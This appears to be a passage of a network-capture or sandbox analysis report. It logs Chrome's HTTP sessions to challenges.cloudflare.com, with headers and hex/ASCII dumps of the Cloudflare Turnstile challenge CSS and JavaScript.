                                                                                                                  2024-12-19 10:42:56 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                                                                  Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                                                  2024-12-19 10:42:56 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                                                                  Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                                                                  2024-12-19 10:42:56 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                                                  Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  8192.168.2.1649727104.18.95.414436456C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-19 10:42:56 UTC383OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-12-19 10:42:56 UTC471INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 19 Dec 2024 10:42:56 GMT
                                                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                                                  Content-Length: 47692
                                                                                                                  Connection: close
                                                                                                                  accept-ranges: bytes
                                                                                                                  last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                                                                                                  cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                  access-control-allow-origin: *
                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f46c9ef1c137d1a-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-12-19 10:42:56 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                  Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                                  2024-12-19 10:42:56 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                  Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                                  2024-12-19 10:42:56 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                                                  Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                                                  2024-12-19 10:42:56 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                                                  Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                                                  2024-12-19 10:42:56 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                                                  Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                                                  2024-12-19 10:42:56 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                                                                                  Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                                                                                  2024-12-19 10:42:56 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                                                                                                  Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
                                                                                                                  2024-12-19 10:42:56 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                                                                                                  Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                                                                                                  2024-12-19 10:42:56 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                                                                                                  Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                                                                                                  2024-12-19 10:42:56 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                                                                                                  Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  9192.168.2.1649728104.18.94.414436456C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-19 10:42:57 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f46c9ee5ddec342&lang=auto HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8b8uu/0x4AAAAAAA1vkTuRch78Npt4/auto/fbE/normal/auto/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-12-19 10:42:58 UTC331INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 19 Dec 2024 10:42:58 GMT
                                                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                                                  Content-Length: 115179
                                                                                                                  Connection: close
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f46c9f8dc450f9b-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-12-19 10:42:58 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74
                                                                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"htt
                                                                                                                  2024-12-19 10:42:58 UTC1369INData Raw: 74 6c 65 22 3a 22 59 6f 75 72 25 32 30 66 65 65 64 62 61 63 6b 25 32 30 72 65 70 6f 72 74 25 32 30 68 61 73 25 32 30 62 65 65 6e 25 32 30 73 75 63 63 65 73 73 66 75 6c 6c 79 25 32 30 73 75 62 6d 69 74 74 65 64 22 2c 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33
                                                                                                                  Data Ascii: tle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3
                                                                                                                  2024-12-19 10:42:58 UTC1369INData Raw: 2c 66 59 2c 67 61 2c 67 67 2c 67 68 2c 67 69 2c 67 73 2c 67 44 2c 67 48 2c 65 50 2c 65 51 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 33 31 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 34 33 29 29 2f 32 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 39 38 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 67 49 28 34 32 33 29 29 2f 34 2b 70 61 72 73 65 49 6e 74 28 67 49 28 33 39 34 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 36 31 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 49 28 34 33 32 29 29 2f 37 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 34 34 34
                                                                                                                  Data Ascii: ,fY,ga,gg,gh,gi,gs,gD,gH,eP,eQ){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1131))/1+parseInt(gI(1143))/2+-parseInt(gI(1298))/3+parseInt(gI(423))/4+parseInt(gI(394))/5+parseInt(gI(1561))/6+parseInt(gI(432))/7*(-parseInt(gI(444
                                                                                                                  2024-12-19 10:42:58 UTC1369INData Raw: 68 2c 67 4c 29 7b 72 65 74 75 72 6e 20 67 4c 3d 67 4b 2c 64 5b 67 4c 28 34 36 31 29 5d 28 6e 75 6c 6c 2c 68 29 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 67 4d 29 7b 72 65 74 75 72 6e 20 67 4d 3d 67 4c 2c 67 4d 28 31 37 33 34 29 5b 67 4d 28 33 37 30 29 5d 28 69 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 6a 2c 6f 2c 73 2c 67 4e 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 2c 52 2c 50 29 7b 69 66 28 67 4e 3d 67 4b 2c 78 3d 7b 7d 2c 78 5b 67 4e 28 38 31 38 29 5d 3d 64 5b 67 4e 28 34 31 31 29 5d 2c 78 5b 67 4e 28 31 34 30 31 29 5d 3d 64 5b 67 4e 28 31 33 33 33 29 5d 2c 42 3d 78 2c 6a 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 44 3d 7b 7d 2c 45 3d 7b 7d 2c 46 3d
                                                                                                                  Data Ascii: h,gL){return gL=gK,d[gL(461)](null,h)?'':f.g(h,6,function(i,gM){return gM=gL,gM(1734)[gM(370)](i)})},'g':function(j,o,s,gN,x,B,C,D,E,F,G,H,I,J,K,L,M,N,O,R,P){if(gN=gK,x={},x[gN(818)]=d[gN(411)],x[gN(1401)]=d[gN(1333)],B=x,j==null)return'';for(D={},E={},F=
